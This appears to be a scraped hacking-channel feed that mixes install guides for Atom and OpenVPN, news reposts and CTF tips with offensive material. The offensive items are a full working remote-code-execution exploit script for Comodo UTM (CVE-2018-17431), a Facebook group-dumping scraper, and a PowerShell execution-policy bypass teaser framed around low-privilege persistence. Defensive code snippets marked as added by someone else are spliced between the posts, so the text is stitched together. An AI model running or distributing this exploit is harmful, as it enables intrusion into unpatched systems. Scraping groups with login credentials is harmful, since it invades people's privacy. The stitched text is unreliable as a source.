UNDERCODE SECURITY
🦑 WELCOME TO UNDERCODE TESTING: LEARN HACKING | PROGRAMMING | SECURITY & more.

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Forwarded from UNDERCODE NEWS
New categories & speed improvement added to Undercodenews.com
Forwarded from UNDERCODE NEWS
New technique: how to scientifically identify fake photos with "no PS traces"?
#Updates
Forwarded from UNDERCODE NEWS
BEWARE OF A NEW CVE IN Mida Framework 2.9.0
#Vulnerabilities
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐉 How to Install Atom Text Editor on Kali Linux 2020.x?

Key features of the Atom text editor

-Cross-platform editing: works on Windows, Linux and macOS

-Has a built-in package manager: easily find and install packages to extend Atom capabilities.

-Smart AutoComplete: Write and edit code faster with smart and flexible autocomplete.

-File System Browser: Easily view and open a single file, an entire project, or multiple projects in one window.

-Highly Customizable: Customize the look and feel of your user interface with CSS / Less and add basic functionality with HTML and JavaScript.

-Provides Multiple Panels: Split the Atom interface into multiple panels for comparing and editing code between files.

INSTALLATION & RUN :

Installing Atom Text Editor on Kali Linux
Add the official Atom package repository to your system by running the following commands.

1) sudo apt update

2) sudo apt -y install wget gpg

3) sudo sh -c 'echo "deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main" > /etc/apt/sources.list.d/atom.list'

4) The repository entry is now stored in a file:

$ cat /etc/apt/sources.list.d/atom.list
deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main

5) Import the repository's GPG key:

wget -qO - https://packagecloud.io/AtomEditor/atom/gpgkey | sudo apt-key add -

6) Then update apt and install the Atom text editor on your Kali Linux machine:

sudo apt update
sudo apt install atom

7) Accept the installation prompt with the y key.

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
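
The key imported with apt-key add in step 5 lands in apt's global trusted keyring, so it is accepted for every configured repository rather than only the Atom one; a signed-by option on the source entry limits the key to that repository. The check below is an added example, not part of the original post, that audits one-line apt source entries for this. The keyring path in the sample is an assumed name.

```python
import re

# One-line apt source entry: type, optional [options], URI, suite, components.
ENTRY_RE = re.compile(
    r"^(?P<type>deb(?:-src)?)\s+"
    r"(?:\[(?P<opts>[^\]]*)\]\s+)?"
    r"(?P<uri>\S+)\s+(?P<suite>\S+)(?P<comps>(?:\s+\S+)*)$"
)

# Constructed sample: the entry from step 3, then the same entry pinned to a
# dedicated keyring (the keyring path is an assumed name, not from the post).
SAMPLE = """\
# /etc/apt/sources.list.d/atom.list
deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main
deb [arch=amd64 signed-by=/usr/share/keyrings/atom.gpg] https://packagecloud.io/AtomEditor/atom/any/ any main
"""


def parse_entry(line):
    """Return a dict for one source entry, or None for blank/comment lines."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    m = ENTRY_RE.match(line)
    if m is None:
        raise ValueError("not a one-line apt source entry")
    opts = {}
    for token in (m.group("opts") or "").split():
        key, _, value = token.partition("=")
        opts[key.lower()] = value
    return {"uri": m.group("uri"), "suite": m.group("suite"),
            "components": m.group("comps").split(), "options": opts}


def audit_sources(text):
    """List (line number, finding) for entries that weaken key scoping."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        try:
            entry = parse_entry(raw)
        except ValueError as exc:
            findings.append((lineno, str(exc)))
            continue
        if entry is None:
            continue
        if "signed-by" not in entry["options"]:
            findings.append((lineno, "no signed-by: any globally trusted key can sign this repo"))
        if entry["options"].get("trusted", "").lower() == "yes":
            findings.append((lineno, "trusted=yes disables signature verification"))
    return findings
```

Running audit_sources(SAMPLE) reports only line 2, the entry exactly as written in step 3.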
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Baidu veteran Shi Youcai was taken away by the police
#international
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 update: dump information from any Facebook group:


INSTALLATION & RUN :

1) https://github.com/kevinzg/facebook-scraper

2) cd facebook-scraper

3) pip install facebook-scraper

4) Send the unique page name as the first parameter and you're good to go:

>>> from facebook_scraper import get_posts
>>> for post in get_posts('nintendo', pages=1):
...     print(post['text'][:50])
...
The final step on the road to the Super Smash Bros
We’re headed to PAX East 3/28-3/31 with new games

CLI usage

$ facebook-scraper --filename nintendo_page_posts.csv --pages 1 nintendo

For the available options, use:

$ facebook-scraper --help

Optional parameters

group: group id, to scrape groups instead of pages. Default is None.

pages: how many pages of posts to request, usually the first page has 2 posts and the rest 4. Default is 10.

timeout: how many seconds to wait before timing out. Default is 5.

sleep: how many seconds to sleep between each request. Default is 0.

credentials: tuple of user and password to login before requesting the posts. Default is None.

extra_info: bool, if true the function will try to do an extra request to get the post reactions. Default is False.

youtube_dl: bool, use Youtube-DL for (high-quality) video extraction. You need to have youtube-dl installed on your environment. Default is False.

🦑 Post example

{'post_id': '2257188721032235',
 'text': 'Don’t let this diminutive version of the Hero of Time fool you, '
         'Young Link is just as heroic as his fully grown version! Young Link '
         'joins the Super Smash Bros. series of amiibo figures!',
 'time': datetime.datetime(2019, 4, 29, 12, 0, 1),
 'image': 'https://scontent.flim16-1.fna.fbcdn.net'
          '/v/t1.0-0/cp0/e15/q65/p320x320'
          '/58680860_2257182054366235_1985558733786185728_n.jpg'
          '?_nc_cat=1&_nc_ht=scontent.flim16-1.fna'
          '&oh=31b0ba32ec7886e95a5478c479ba1d38&oe=5D6CDEE4',
 'likes': 2036,
 'comments': 214,
 'shares': 0,
 'reactions': {'like': 135, 'love': 64, 'haha': 10, 'wow': 4, 'anger': 1},  # if extra_info was set
 'post_url': 'https://m.facebook.com/story.php'
             '?story_fbid=2257188721032235&id=119240841493711',
 'link': 'https://bit.ly/something'}

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 THIS IS THE LATEST COMODO EXPLOIT :
(patched now)

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE details: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8

import requests

def RndInt(Lenght):
    # Return a string of random decimal digits of the requested length
    from random import choice
    from string import digits

    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)

if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
    '''For more info about command try to read manual of specific version of Comodo UTM and
    exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
    '''

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) + "&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) + "&_=" + RndInt(13)
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart

    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)

    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
        exit(0)

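
For defenders, the request shape in the PoC above (the /manage/webshell/u path with console keystrokes percent-encoded in the k parameter) is easy to look for in proxy or web access logs of an appliance that is not yet patched. The following detection sketch is an added example, not part of the original post or of the PoC author's code. The log layout and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

WEBSHELL_PATH = "/manage/webshell/u"  # endpoint requested by the PoC above

# Assumed log layout: Common Log Format up to the status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines; the addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Sep/2020:12:04:18 +0000] "GET /manage/webshell/u?s=4&w=120&h=33'
    '&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a'
    '&l=12&_=1599739458123 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Sep/2020:12:04:19 +0000] "GET /manage/webshell/u?s=4&w=120&h=33'
    '&k=%0a&l=12&_=1599739458123 HTTP/1.1" 200 88',
    '192.0.2.10 - - [10/Sep/2020:12:05:02 +0000] "GET / HTTP/1.1" 200 4096',
]


def find_webshell_keystrokes(lines):
    """Return one record per request that sends keystrokes to the web console."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        url = urlsplit(m.group("target"))
        if url.path != WEBSHELL_PATH:
            continue
        keys = parse_qs(url.query, keep_blank_values=True).get("k")
        if not keys:
            continue
        typed = keys[0]  # parse_qs has already percent-decoded the value
        hits.append({
            "src": m.group("src"),
            "time": m.group("time"),
            "status": int(m.group("status")),
            # Newline-separated console input, as in the PoC's Command string.
            "commands": [c for c in re.split(r"[\r\n]+", typed) if c],
            "submits_line": "\n" in typed or "\r" in typed,
        })
    return hits
```

On the sample, the first hit decodes to the console input service / ssh / disable and the second is the bare Enter that follows it; any such request from an address that is not an administrator workstation deserves a look.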
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is Capture the Flag - CTF?
#FastTips

-CTFs (capture the flag) are computer security/hacking competitions which generally consist of participants breaking, investigating, reverse engineering and doing anything they can to reach the end goal, a “flag” which is usually found as a string of text.


-DEF CON hosts what is the most widely known and first major CTF, occurring annually at the hacking conference in Las Vegas. Many different competitions have branched off since then, and numerous ones are available year round. One of the best places to see when CTFs are being scheduled is ctftime, an active website with calendars and team rankings.

wiki source
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
User safety is a thing of the past. The password can be picked in $ 25 and 12 minutes
#DataBreaches
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Finding a CTF :

If you ever wanted to start running, you were probably encouraged to sign up to a 5k to keep focused on a goal. The same principle applies here: pick a CTF in the near future that you want to compete in and come up with a practice schedule. Here are some CTFs that we can recommend:


1) PicoCTF and PlaidCTF by CMU

2) HSCTF is made for high school students

3) Ghost in the Shellcode (GitS)

4) CSAW CTF by NYU-Poly

5) UCSB iCTF is for academics only

6) Defcon CTF

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
PowerShell ExecutionPolicy Bypass.pdf
1.1 MB
According to Microsoft, the execution policy is part of the security strategy of PowerShell. It determines whether you can load configuration files (including your PowerShell profile) and run scripts, and it determines which scripts, if any, must be digitally signed before they will run. It should be noted that Microsoft has gone on record saying that the ExecutionPolicy was never intended to be a security control.
In order to change the PowerShell Execution Policy you have to start PowerShell as an administrator and run the following command: Set-ExecutionPolicy -ExecutionPolicy RemoteSigned. You can also set the policy to Unrestricted instead of RemoteSigned, but this is discouraged by Microsoft.
Alright, but what if you are not an administrator yet? You have basic low privilege access to a Windows machine, and you need to upgrade your shell to something more stable, or to add some Empire persistence. How can you change the ExecutionPolicy?
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🖧 How to install and connect the OpenVPN client on Debian, Kali 2020 and Parrot?

1) Installing the OpenVPN Client
OpenVPN packages are available in the default Debian repositories.

2) Open a terminal on your Debian system and update the apt cache.

3) After that, install the OpenVPN package.

4) Open a terminal and run the commands to install the openvpn client on Debian:

sudo apt update

sudo apt install openvpn -y

5) Connect to OpenVPN Server
Copy the openvpn client config file to your Debian machine.

6) You can use the --config command line parameter to provide a configuration file.

7) The command will read all the necessary data to create a vpn from this file.

8) Let's run the following command to connect to the openvpn server:

openvpn --config client.ovpn

9) You should see the following output:

Thu Sep 10 12:04:18 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:18 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Thu Sep 10 12:04:18 2020 UDP link local: (not bound)
Thu Sep 10 12:04:18 2020 UDP link remote: [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:18 2020 TLS: Initial packet from [AF_INET]69.87.218.145:1194, sid=6d27e1cb 524bd8cd
Thu Sep 10 12:04:18 2020 VERIFY OK: depth=1, CN=Easy-RSA CA
Thu Sep 10 12:04:18 2020 VERIFY OK: depth=0, CN=tecadmin-server
Thu Sep 10 12:04:18 2020 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, 2048 bit RSA
Thu Sep 10 12:04:18 2020 [tecadmin-server] Peer Connection Initiated with [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:19 2020 SENT CONTROL [tecadmin-server]: 'PUSH_REQUEST' (status=1)
Thu Sep 10 12:04:19 2020 PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,route 10.8.0.1,topology net30,ping 20,ping-restart 60,ifconfig 10.8.0.6 10.8.0.5,peer-id 0,cipher AES-256-GCM'
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: timers and/or timeouts modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: --ifconfig/up options modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: route options modified
10) Check the connection
After a successful connection, a new IP address will be assigned on the tun0 interface by the OpenVPN server.

11) You can check it with the following command:

ip a show tun0

🦑 Output:

4: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link/none
    inet 10.8.0.6 peer 10.8.0.5/32 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::7226:57b1:f101:313b/64 scope link stable-privacy
       valid_lft forever preferred_lft forever

12) You can also check the OpenVPN server log to check the connection status:

tail -f /var/log/openvpn.log

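
The client log in step 9 already states what the server made the client do: which certificate chain was verified and which routing and DNS options were pushed. The parser below is an added example, not part of the original post, that pulls those facts out of a client log. The sample lines are taken from the output above with the timestamps dropped.

```python
import re

VERIFY_RE = re.compile(r"VERIFY OK: depth\s*=\s*(?P<depth>\d+),\s*CN\s*=\s*(?P<cn>.+)$")
PUSH_RE = re.compile(r"PUSH: Received control message: '\s*PUSH_REPLY\s*,(?P<opts>[^']*)'")

# Sample lines from the post's own output (timestamps removed).
SAMPLE_LOG = """\
VERIFY OK: depth=1, CN=Easy-RSA CA
VERIFY OK: depth=0, CN=tecadmin-server
PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,route 10.8.0.1,topology net30,ping 20,ping-restart 60,ifconfig 10.8.0.6 10.8.0.5,peer-id 0,cipher AES-256-GCM'
"""


def summarize_client_log(log_text):
    """Collect the verified certificate chain and the options the server pushed."""
    summary = {"verified_chain": [], "full_tunnel": False, "dns": [],
               "routes": [], "tunnel_ip": None, "cipher": None}
    for line in log_text.splitlines():
        verified = VERIFY_RE.search(line)
        if verified:
            summary["verified_chain"].append(
                (int(verified["depth"]), verified["cn"].strip()))
            continue
        pushed = PUSH_RE.search(line)
        if not pushed:
            continue
        # Options are comma separated; each is a name followed by arguments.
        for option in pushed["opts"].split(","):
            words = option.split()
            if not words:
                continue
            name, args = words[0], words[1:]
            if name == "redirect-gateway":
                summary["full_tunnel"] = True  # default route goes via the VPN
            elif name == "dhcp-option" and len(args) >= 2 and args[0] == "DNS":
                summary["dns"].append(args[1])
            elif name == "route" and args:
                summary["routes"].append(args[0])
            elif name == "ifconfig" and args:
                summary["tunnel_ip"] = args[0]
            elif name == "cipher" and args:
                summary["cipher"] = args[0]
    return summary
```

On Linux the pushed DNS servers take effect only if the client configuration runs a resolver update script, so compare the dns list with the resolver the machine is actually using.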
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
18TB hard drive spring is here, Western Red Disk and Purple Disk are upgraded at the same time
#Technologies
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🌐 Windows 10 update removes the need to remember passwords with Windows Hello and FIDO2:

1) Last fall, we learned that Windows aims to eliminate the need to remember passwords using Windows Hello, a biometrics-based technology.

2) This makes things a little easier, since there is no need to keep a separate list somewhere of all the different passwords and password versions that you use.

3) Now achieving this goal is made even more realistic as Windows Hello has achieved FIDO2 certification, which allows biometrics and PINs to be treated as secure authenticators.

Say goodbye to passwords

4) Microsoft knows what everyone thinks about passwords, noting that "no one likes passwords (except hackers)."

5) Since the advent of the computer systems that we all use, we have had to remember passwords - for computer systems, websites, applications, devices, and the like.

“People don't like passwords because we have to remember them,” Microsoft explained.

"As a result, we often create passwords that are easy to guess — making them the first target for hackers trying to gain access to your computer or network."

6) The need for confidentiality meant passwords for everything.

This increased need has led to different types of passwords.

7) Instead of your birthday, anniversary, dog name, street name, etc., you were forced to remember more complex passwords or have a password manager.

8) These are the reasons that led the company to create Windows Hello last fall.

9) This biometrics-based technology used FIDO, which allowed Windows users to authenticate secure access using only fingerprints or facial recognition.

Windows Hello has now received FIDO2 certification, which adds acceptable standards for authentication.

10) This updated method now also includes the use of PINs.

11) The FIDO Alliance explained in a press release that “FIDO2 is a set of standards that enables easy and secure access to websites and applications using biometrics, mobile devices and/or FIDO security keys.

12) FIDO2's simplified login process is provided with robust cryptographic protection that far surpasses passwords, protecting users from phishing, all forms of password theft and replay attacks.”

Windows 10X was recently announced.

13) Here you can see if these tools and the general list of Windows 10X options will be available.

Windows Hello and FIDO2 integration
You can take advantage of Windows Hello with FIDO2 by updating Windows 10 to version 1903.

14) Microsoft Edge, Google Chrome and Mozilla Firefox will support biometrics and PINs.

Other Microsoft products such as Office 365, Skype, and Xbox Live can also authenticate using Windows Hello.

15) Will you be upgrading to Windows 10 to take advantage of Windows Hello and FIDO2 technologies?

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁